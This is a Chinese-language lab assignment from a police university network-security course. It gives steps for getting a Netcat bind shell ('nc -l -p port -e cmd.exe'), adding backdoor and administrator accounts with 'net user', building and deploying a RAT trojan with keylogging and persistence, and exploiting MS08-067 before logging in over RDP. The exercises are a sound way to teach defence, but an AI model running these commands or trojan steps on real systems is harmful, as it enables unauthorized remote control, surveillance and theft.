中國人民公安大學

Chinese people’ public security university網路對抗技術惡意程式碼技術學生姓名 張光輝年級 15級三區隊 

指導教師 高見老師資訊科技與網路安全學院2018年10月24日實驗任務總綱2018—2019學年 第 一 學期

一、實驗目的1．通過對木馬的練習，使讀者理解和掌握木馬傳播和執行的機制；通過手動刪除木馬，掌握檢查木馬和刪除木馬的技巧，學會防禦木馬的相關知識，加深對木馬的安全防範意識。2．瞭解並熟悉常用的網路攻擊工具，木馬的基本功能；3．達到鞏固課程知識和實際應用的目的。二、實驗要求1．認真閱讀每個實驗內容，需要截圖的題目，需清晰截圖並對截圖進行標註和說明。2．文件要求結構清晰，圖文表達準確，標註規範。推理內容客觀、合理、邏輯性強。3．軟體工具可使用NC、MSF等。4．實驗結束後，保留電子文件。三、實驗步驟1．準備提前做好實驗準備，實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容，熟悉並準備好實驗用的軟體工具，按照實驗內容和要求提前做好實驗內容的準備。2．實驗環境描述實驗所使用的硬體和軟體環境（包括各種軟體工具）；開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。3．實驗過程1）啟動系統和啟動工具軟體環境。2）用軟體工具實現實驗內容。4．實驗報告按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中，文件按照規定的書寫格式書寫，表格要有表說圖形要有圖說。任務一 利用NC控制電腦NetCat，具有網路軍刀之稱，它小巧精悍且功能強大，說它小巧精悍，是因為他的軟體大小現在已經壓縮到只有十幾KB，而且在功能上絲毫不減。實驗過程需要兩個同學相互配合完成：步驟一：在受害者的機器 （同學A）輸入下面的命令：　　nc.exe -l -p port -e cmd.exe 進入監聽模式

步驟二：　　在攻擊者的機器.（同學B）輸入下面的命令：　　nc ip port //連線victim_IP,然後得到一個shell。 （需要截圖）

步驟三：在shell中，利用net user 使用者名稱 密碼 /add ，新增一個使用者，並在受害者的機器中使用 net user 命令進行驗證。（需要截圖）

可以繼續通過命令列做一些事情。任務二 利用木馬控制電腦實驗過程需要兩個同學配合：步驟一：　攻擊者的機器. （同學A）開啟V2014.exe程式或則star RAT，這兩個木馬功能類似。

步驟二：　　點選選單欄中的“服務生成”，在彈出的配置服務端中，配置回連IP地址（攻擊者IP）和埠號，並點選“生成”按鈕，生成木馬服務端。

步驟三：將生成的木馬可執行程式拷貝到受害者的機器，並雙擊執行。

雙擊執行不佔用cpu。？？

步驟四：

在控制端中檢視木馬上線情況，並對以下功能每個進行測試和截圖。

1.檔案管理，嘗試拷貝檔案

1.螢幕控制，嘗試獲取桌面2.3.鍵盤記錄，嘗試獲取對方擊鍵記錄4.會話管理，重啟對方機器，檢視是否能自啟動上線會話管理，解除安裝對方的木馬。任務三 通過漏洞獲取shell（合天平臺中做） 所有過程截圖寫部落格windows ms08067 漏洞利用在平臺中獲取shell之後，繼續利用攻擊機器使用net user user pass /addnet localgroup administrators /add命令向被攻擊的機器中新增賬戶，並提升為管理員然後用rdesktop 10.1.1.130 登陸對方的遠端桌面